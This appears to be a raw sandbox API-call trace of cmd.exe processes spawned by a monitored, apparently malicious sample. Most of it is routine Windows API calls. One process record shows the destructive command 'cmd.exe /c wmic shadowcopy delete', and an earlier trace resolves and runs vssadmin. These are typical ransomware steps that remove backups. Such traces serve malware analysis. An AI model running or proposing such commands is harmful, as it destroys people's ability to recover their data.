(HeapHandle=0x5b0000, Flags=0x8, Size=0xae2) returned 0x5c4b90 [0092.836] FreeEnvironmentStringsW (penv=0x5c2230) returned 1 [0092.836] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x49eb0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0092.836] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x49eb0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0092.836] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0092.836] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0092.836] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0092.836] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0092.836] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0092.836] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0092.836] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0092.836] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0092.836] GetProcessHeap () returned 0x5b0000 [0092.836] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x54) returned 0x5c5680 [0092.836] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x16fa28 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0092.837] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x104, lpBuffer=0x16fa28, lpFilePart=0x16fa24 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x16fa24*="Desktop") returned 0x25 [0092.837] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0092.837] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x16f7a4 | out: lpFindFileData=0x16f7a4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x5c1e98 [0092.837] FindClose (in: hFindFile=0x5c1e98 | out: hFindFile=0x5c1e98) returned 1 [0092.838] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x16f7a4 | out: lpFindFileData=0x16f7a4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x5c1e98 [0092.838] FindClose (in: hFindFile=0x5c1e98 | out: hFindFile=0x5c1e98) returned 1 [0092.838] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0092.838] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x16f7a4 | out: lpFindFileData=0x16f7a4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x1fdad3c0, ftLastAccessTime.dwHighDateTime=0x1d62227, ftLastWriteTime.dwLowDateTime=0x1fdad3c0, ftLastWriteTime.dwHighDateTime=0x1d62227, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x5c1e98 [0092.842] FindClose (in: hFindFile=0x5c1e98 | out: hFindFile=0x5c1e98) returned 1 [0092.842] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0092.842] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0092.842] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0092.842] GetProcessHeap () returned 0x5b0000 [0092.842] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c4b90 | out: hHeap=0x5b0000) returned 1 [0092.842] GetEnvironmentStringsW () returned 0x5c40a0* [0092.842] GetProcessHeap () returned 0x5b0000 [0092.842] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0xb36) returned 0x5c5ee0 [0092.843] FreeEnvironmentStringsW (penv=0x5c40a0) returned 1 [0092.843] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49ea5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0092.843] GetProcessHeap () returned 0x5b0000 [0092.843] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c5680 | out: hHeap=0x5b0000) returned 1 [0092.843] GetProcessHeap () returned 0x5b0000 [0092.843] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x400e) returned 0x5c6a20 [0092.844] GetProcessHeap () returned 0x5b0000 [0092.844] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x54) returned 0x5c2d70 [0092.844] GetProcessHeap () returned 0x5b0000 [0092.844] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c6a20 | out: hHeap=0x5b0000) returned 1 [0092.844] GetConsoleOutputCP () returned 0x1b5 [0092.844] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49ea4260 | out: lpCPInfo=0x49ea4260) returned 1 [0092.844] GetUserDefaultLCID () returned 0x409 [0092.982] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x49ea4950, cchData=8 | out: lpLCData=":") returned 2 [0092.983] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x16fb68, cchData=128 | out: lpLCData="0") returned 2 [0092.983] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x16fb68, cchData=128 | out: lpLCData="0") returned 2 [0092.983] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x16fb68, cchData=128 | out: lpLCData="1") returned 2 [0092.983] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x49ea4940, cchData=8 | out: lpLCData="/") returned 2 [0092.983] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x49ea4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0092.983] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x49ea4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0092.983] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x49ea4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0092.983] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x49ea4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0092.983] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x49ea4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0092.983] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x49ea4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0092.984] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x49ea4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0092.984] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x49ea4930, cchData=8 | out: lpLCData=".") returned 2 [0092.984] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x49ea4920, cchData=8 | out: lpLCData=",") returned 2 [0092.984] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0092.986] GetProcessHeap () returned 0x5b0000 [0092.986] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x20c) returned 0x5c2dd0 [0092.986] GetConsoleTitleW (in: lpConsoleTitle=0x5c2dd0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0092.987] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0092.987] GetProcAddress (hModule=0x76d30000, lpProcName="CopyFileExW") returned 0x76d63b92 [0092.987] GetProcAddress (hModule=0x76d30000, lpProcName="IsDebuggerPresent") returned 0x76d44a5d [0092.987] GetProcAddress (hModule=0x76d30000, lpProcName="SetConsoleInputExeNameW") returned 0x76d5a79d [0092.988] GetProcessHeap () returned 0x5b0000 [0092.988] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x400a) returned 0x5c6a20 [0092.988] GetProcessHeap () returned 0x5b0000 [0092.988] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c6a20 | out: hHeap=0x5b0000) returned 1 [0092.989] _wcsicmp (_String1="vssadmin", _String2=")") returned 77 [0092.990] _wcsicmp (_String1="FOR", _String2="vssadmin") returned -16 [0092.990] _wcsicmp (_String1="FOR/?", _String2="vssadmin") returned -16 [0092.990] _wcsicmp (_String1="IF", _String2="vssadmin") returned -13 [0092.990] _wcsicmp (_String1="IF/?", _String2="vssadmin") returned -13 [0092.990] _wcsicmp (_String1="REM", _String2="vssadmin") returned -4 [0092.990] _wcsicmp (_String1="REM/?", _String2="vssadmin") returned -4 [0092.990] GetProcessHeap () returned 0x5b0000 [0092.990] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x58) returned 0x5c2fe8 [0092.990] GetProcessHeap () returned 0x5b0000 [0092.990] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x1a) returned 0x5c5720 [0092.991] GetProcessHeap () returned 0x5b0000 [0092.991] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x40) returned 0x5c3048 [0092.993] GetConsoleTitleW (in: lpConsoleTitle=0x16f860, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0092.994] _wcsicmp (_String1="vssadmin", _String2="DIR") returned 18 [0092.994] _wcsicmp (_String1="vssadmin", _String2="ERASE") returned 17 [0092.994] _wcsicmp (_String1="vssadmin", _String2="DEL") returned 18 [0092.994] _wcsicmp (_String1="vssadmin", _String2="TYPE") returned 2 [0092.994] _wcsicmp (_String1="vssadmin", _String2="COPY") returned 19 [0092.994] _wcsicmp (_String1="vssadmin", _String2="CD") returned 19 [0092.994] _wcsicmp (_String1="vssadmin", _String2="CHDIR") returned 19 [0092.994] _wcsicmp (_String1="vssadmin", _String2="RENAME") returned 4 [0092.994] _wcsicmp (_String1="vssadmin", _String2="REN") returned 4 [0092.995] _wcsicmp (_String1="vssadmin", _String2="ECHO") returned 17 [0092.995] _wcsicmp (_String1="vssadmin", _String2="SET") returned 3 [0092.995] _wcsicmp (_String1="vssadmin", _String2="PAUSE") returned 6 [0092.995] _wcsicmp (_String1="vssadmin", _String2="DATE") returned 18 [0092.995] _wcsicmp (_String1="vssadmin", _String2="TIME") returned 2 [0092.995] _wcsicmp (_String1="vssadmin", _String2="PROMPT") returned 6 [0092.995] _wcsicmp (_String1="vssadmin", _String2="MD") returned 9 [0092.995] _wcsicmp (_String1="vssadmin", _String2="MKDIR") returned 9 [0092.995] _wcsicmp (_String1="vssadmin", _String2="RD") returned 4 [0092.995] _wcsicmp (_String1="vssadmin", _String2="RMDIR") returned 4 [0092.995] _wcsicmp (_String1="vssadmin", _String2="PATH") returned 6 [0092.995] _wcsicmp (_String1="vssadmin", _String2="GOTO") returned 15 [0092.995] _wcsicmp (_String1="vssadmin", _String2="SHIFT") returned 3 [0092.995] _wcsicmp (_String1="vssadmin", _String2="CLS") returned 19 [0092.995] _wcsicmp (_String1="vssadmin", _String2="CALL") returned 19 [0092.995] _wcsicmp (_String1="vssadmin", _String2="VERIFY") returned 14 [0092.995] _wcsicmp (_String1="vssadmin", _String2="VER") returned 14 [0092.995] _wcsicmp (_String1="vssadmin", _String2="VOL") returned 4 [0092.995] _wcsicmp (_String1="vssadmin", _String2="EXIT") returned 17 [0092.996] _wcsicmp (_String1="vssadmin", _String2="SETLOCAL") returned 3 [0092.996] _wcsicmp (_String1="vssadmin", _String2="ENDLOCAL") returned 17 [0092.996] _wcsicmp (_String1="vssadmin", _String2="TITLE") returned 2 [0092.996] _wcsicmp (_String1="vssadmin", _String2="START") returned 3 [0092.996] _wcsicmp (_String1="vssadmin", _String2="DPATH") returned 18 [0092.996] _wcsicmp (_String1="vssadmin", _String2="KEYS") returned 11 [0092.996] _wcsicmp (_String1="vssadmin", _String2="MOVE") returned 9 [0092.996] _wcsicmp (_String1="vssadmin", _String2="PUSHD") returned 6 [0092.996] _wcsicmp (_String1="vssadmin", _String2="POPD") returned 6 [0092.996] _wcsicmp (_String1="vssadmin", _String2="ASSOC") returned 21 [0092.996] _wcsicmp (_String1="vssadmin", _String2="FTYPE") returned 16 [0092.996] _wcsicmp (_String1="vssadmin", _String2="BREAK") returned 20 [0092.996] _wcsicmp (_String1="vssadmin", _String2="COLOR") returned 19 [0092.996] _wcsicmp (_String1="vssadmin", _String2="MKLINK") returned 9 [0092.996] _wcsicmp (_String1="vssadmin", _String2="DIR") returned 18 [0092.996] _wcsicmp (_String1="vssadmin", _String2="ERASE") returned 17 [0092.997] _wcsicmp (_String1="vssadmin", _String2="DEL") returned 18 [0092.997] _wcsicmp (_String1="vssadmin", _String2="TYPE") returned 2 [0092.997] _wcsicmp (_String1="vssadmin", _String2="COPY") returned 19 [0092.997] _wcsicmp (_String1="vssadmin", _String2="CD") returned 19 [0092.997] _wcsicmp (_String1="vssadmin", _String2="CHDIR") returned 19 [0092.997] _wcsicmp (_String1="vssadmin", _String2="RENAME") returned 4 [0092.997] _wcsicmp (_String1="vssadmin", _String2="REN") returned 4 [0092.997] _wcsicmp (_String1="vssadmin", _String2="ECHO") returned 17 [0092.997] _wcsicmp (_String1="vssadmin", _String2="SET") returned 3 [0092.997] _wcsicmp (_String1="vssadmin", _String2="PAUSE") returned 6 [0092.997] _wcsicmp (_String1="vssadmin", _String2="DATE") returned 18 [0092.997] _wcsicmp (_String1="vssadmin", _String2="TIME") returned 2 [0092.997] _wcsicmp (_String1="vssadmin", _String2="PROMPT") returned 6 [0092.997] _wcsicmp (_String1="vssadmin", _String2="MD") returned 9 [0092.997] _wcsicmp (_String1="vssadmin", _String2="MKDIR") returned 9 [0092.997] _wcsicmp (_String1="vssadmin", _String2="RD") returned 4 [0092.997] _wcsicmp (_String1="vssadmin", _String2="RMDIR") returned 4 [0092.997] _wcsicmp (_String1="vssadmin", _String2="PATH") returned 6 [0092.997] _wcsicmp (_String1="vssadmin", _String2="GOTO") returned 15 [0092.998] _wcsicmp (_String1="vssadmin", _String2="SHIFT") returned 3 [0092.998] _wcsicmp (_String1="vssadmin", _String2="CLS") returned 19 [0092.998] _wcsicmp (_String1="vssadmin", _String2="CALL") returned 19 [0092.998] _wcsicmp (_String1="vssadmin", _String2="VERIFY") returned 14 [0092.998] _wcsicmp (_String1="vssadmin", _String2="VER") returned 14 [0092.998] _wcsicmp (_String1="vssadmin", _String2="VOL") returned 4 [0092.998] _wcsicmp (_String1="vssadmin", _String2="EXIT") returned 17 [0092.998] _wcsicmp (_String1="vssadmin", _String2="SETLOCAL") returned 3 [0092.998] _wcsicmp (_String1="vssadmin", _String2="ENDLOCAL") returned 17 [0092.998] _wcsicmp (_String1="vssadmin", _String2="TITLE") returned 2 [0092.998] _wcsicmp (_String1="vssadmin", _String2="START") returned 3 [0092.998] _wcsicmp (_String1="vssadmin", _String2="DPATH") returned 18 [0092.998] _wcsicmp (_String1="vssadmin", _String2="KEYS") returned 11 [0092.998] _wcsicmp (_String1="vssadmin", _String2="MOVE") returned 9 [0092.998] _wcsicmp (_String1="vssadmin", _String2="PUSHD") returned 6 [0092.998] _wcsicmp (_String1="vssadmin", _String2="POPD") returned 6 [0092.998] _wcsicmp (_String1="vssadmin", _String2="ASSOC") returned 21 [0092.998] _wcsicmp (_String1="vssadmin", _String2="FTYPE") returned 16 [0092.999] _wcsicmp (_String1="vssadmin", _String2="BREAK") returned 20 [0092.999] _wcsicmp (_String1="vssadmin", _String2="COLOR") returned 19 [0092.999] _wcsicmp (_String1="vssadmin", _String2="MKLINK") returned 9 [0092.999] _wcsicmp (_String1="vssadmin", _String2="FOR") returned 16 [0092.999] _wcsicmp (_String1="vssadmin", _String2="IF") returned 13 [0092.999] _wcsicmp (_String1="vssadmin", _String2="REM") returned 4 [0093.000] GetProcessHeap () returned 0x5b0000 [0093.000] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x210) returned 0x5c3090 [0093.000] GetProcessHeap () returned 0x5b0000 [0093.000] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x52) returned 0x5c32a8 [0093.000] _wcsnicmp (_String1="vssa", _String2="cmd ", _MaxCount=0x4) returned 19 [0093.000] GetProcessHeap () returned 0x5b0000 [0093.000] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x418) returned 0x5b07f0 [0093.001] SetErrorMode (uMode=0x0) returned 0x0 [0093.001] SetErrorMode (uMode=0x1) returned 0x0 [0093.001] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x5b07f8, lpFilePart=0x16f380 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x16f380*="Desktop") returned 0x25 [0093.001] SetErrorMode (uMode=0x0) returned 0x1 [0093.001] GetProcessHeap () returned 0x5b0000 [0093.001] RtlReAllocateHeap (Heap=0x5b0000, Flags=0x0, Ptr=0x5b07f0, Size=0x66) returned 0x5b07f0 [0093.001] GetProcessHeap () returned 0x5b0000 [0093.001] RtlSizeHeap (HeapHandle=0x5b0000, Flags=0x0, MemoryPointer=0x5b07f0) returned 0x66 [0093.001] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49eb0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0093.001] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0093.001] GetProcessHeap () returned 0x5b0000 [0093.001] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x120) returned 0x5c3308 [0093.001] GetProcessHeap () returned 0x5b0000 [0093.002] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x238) returned 0x5b0860 [0093.016] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\vssadmin.*", fInfoLevelId=0x1, lpFindFileData=0x16f0fc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x16f0fc) returned 0xffffffff [0093.016] GetLastError () returned 0x2 [0093.016] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\vssadmin", fInfoLevelId=0x1, lpFindFileData=0x16f0fc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x16f0fc) returned 0xffffffff [0093.017] GetLastError () returned 0x2 [0093.017] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\vssadmin.*", fInfoLevelId=0x1, lpFindFileData=0x16f0fc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x16f0fc) returned 0x5c34b0 [0093.017] GetProcessHeap () returned 0x5b0000 [0093.017] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x14) returned 0x5c34f0 [0093.017] FindClose (in: hFindFile=0x5c34b0 | out: hFindFile=0x5c34b0) returned 1 [0093.017] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\vssadmin.COM", fInfoLevelId=0x1, lpFindFileData=0x16f0fc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x16f0fc) returned 0xffffffff [0093.017] GetLastError () returned 0x2 [0093.018] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\vssadmin.EXE", fInfoLevelId=0x1, lpFindFileData=0x16f0fc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x16f0fc) returned 0x5c34b0 [0093.018] GetProcessHeap () returned 0x5b0000 [0093.018] RtlReAllocateHeap (Heap=0x5b0000, Flags=0x0, Ptr=0x5c34f0, Size=0x4) returned 0x5c34f0 [0093.018] FindClose (in: hFindFile=0x5c34b0 | out: hFindFile=0x5c34b0) returned 1 [0093.018] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0093.018] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0093.018] GetConsoleTitleW (in: lpConsoleTitle=0x16f5f4, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0093.190] InitializeProcThreadAttributeList (in: lpAttributeList=0x16f47c, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x16f544 | out: lpAttributeList=0x16f47c, lpSize=0x16f544) returned 1 [0093.190] UpdateProcThreadAttribute (in: lpAttributeList=0x16f47c, dwFlags=0x0, Attribute=0x60001, lpValue=0x16f53c, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x16f47c, lpPreviousValue=0x0) returned 1 [0093.190] GetStartupInfoW (in: lpStartupInfo=0x16f438 | out: lpStartupInfo=0x16f438*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0093.330] CloseHandle (hObject=0x74) returned 1 [0093.330] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0093.330] GetProcessHeap () returned 0x5b0000 [0093.331] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c5ee0 | out: hHeap=0x5b0000) returned 1 [0093.331] GetEnvironmentStringsW () returned 0x5c5ee0* [0093.331] GetProcessHeap () returned 0x5b0000 [0093.331] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0xb36) returned 0x5c40a0 [0093.331] FreeEnvironmentStringsW (penv=0x5c5ee0) returned 1 [0093.331] WaitForSingleObject (hHandle=0x78, dwMilliseconds=0xffffffff) returned 0x0 [0096.650] GetExitCodeProcess (in: hProcess=0x78, lpExitCode=0x16f418 | out: lpExitCode=0x16f418*=0x2) returned 1 [0096.651] CloseHandle (hObject=0x78) returned 1 [0096.651] _vsnwprintf (in: _Buffer=0x16f560, _BufferCount=0x13, _Format="%08X", _ArgList=0x16f424 | out: _Buffer="00000002") returned 8 [0096.651] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1 [0096.652] GetProcessHeap () returned 0x5b0000 [0096.652] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c40a0 | out: hHeap=0x5b0000) returned 1 [0096.652] GetEnvironmentStringsW () returned 0x5c40a0* [0096.652] GetProcessHeap () returned 0x5b0000 [0096.652] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0xb5c) returned 0x5c9588 [0096.652] FreeEnvironmentStringsW (penv=0x5c40a0) returned 1 [0096.652] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0096.652] GetProcessHeap () returned 0x5b0000 [0096.652] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c9588 | out: hHeap=0x5b0000) returned 1 [0096.652] GetEnvironmentStringsW () returned 0x5c40a0* [0096.653] GetProcessHeap () returned 0x5b0000 [0096.653] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0xb5c) returned 0x5c9588 [0096.653] FreeEnvironmentStringsW (penv=0x5c40a0) returned 1 [0096.653] GetProcessHeap () returned 0x5b0000 [0096.653] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5bfef0 | out: hHeap=0x5b0000) returned 1 [0096.653] DeleteProcThreadAttributeList (in: lpAttributeList=0x16f47c | out: lpAttributeList=0x16f47c) [0096.653] _get_osfhandle (_FileHandle=1) returned 0x7 [0096.653] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0096.654] _get_osfhandle (_FileHandle=1) returned 0x7 [0096.654] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49ea41ac | out: lpMode=0x49ea41ac) returned 1 [0096.654] _get_osfhandle (_FileHandle=0) returned 0x3 [0096.654] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49ea41b0 | out: lpMode=0x49ea41b0) returned 1 [0096.655] SetConsoleInputExeNameW () returned 0x1 [0096.655] GetConsoleOutputCP () returned 0x1b5 [0096.655] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49ea4260 | out: lpCPInfo=0x49ea4260) returned 1 [0096.655] SetThreadUILanguage (LangId=0x0) returned 0x409 [0096.656] exit (_Code=2) Process: id = "31" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x3a80a000" os_pid = "0x5bc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "21" os_parent_pid = "0xac4" cmd_line = "cmd.exe /c wmic shadowcopy delete" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 118 os_tid = 0x7bc [0093.894] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x30fadc | out: lpSystemTimeAsFileTime=0x30fadc*(dwLowDateTime=0x25da2aa0, dwHighDateTime=0x1d62227)) [0093.894] GetCurrentProcessId () returned 0x5bc [0093.894] GetCurrentThreadId () returned 0x7bc [0093.894] GetTickCount () returned 0x114e486 [0093.894] QueryPerformanceCounter (in: lpPerformanceCount=0x30fad4 | out: lpPerformanceCount=0x30fad4*=21384915654) returned 1 [0093.895] GetModuleHandleA (lpModuleName=0x0) returned 0x49e80000 [0093.895] __set_app_type (_Type=0x1) [0093.895] __p__fmode () returned 0x770331f4 [0093.895] __p__commode () returned 0x770331fc [0093.896] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x49ea21a6) returned 0x0 [0093.896] __getmainargs (in: _Argc=0x49ea4238, _Argv=0x49ea4240, _Env=0x49ea423c, _DoWildCard=0, _StartInfo=0x49ea4140 | out: _Argc=0x49ea4238, _Argv=0x49ea4240, _Env=0x49ea423c) returned 0 [0093.896] GetCurrentThreadId () returned 0x7bc [0093.896] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x7bc) returned 0x60 [0093.896] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0093.896] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadUILanguage") returned 0x76d5a84f [0093.897] SetThreadUILanguage (LangId=0x0) returned 0x409 [0093.897] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0093.897] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x30fa6c | out: phkResult=0x30fa6c*=0x0) returned 0x2 [0093.898] VirtualQuery (in: lpAddress=0x30faa3, lpBuffer=0x30fa3c, dwLength=0x1c | out: lpBuffer=0x30fa3c*(BaseAddress=0x30f000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0093.898] VirtualQuery (in: lpAddress=0x210000, lpBuffer=0x30fa3c, dwLength=0x1c | out: lpBuffer=0x30fa3c*(BaseAddress=0x210000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0093.898] 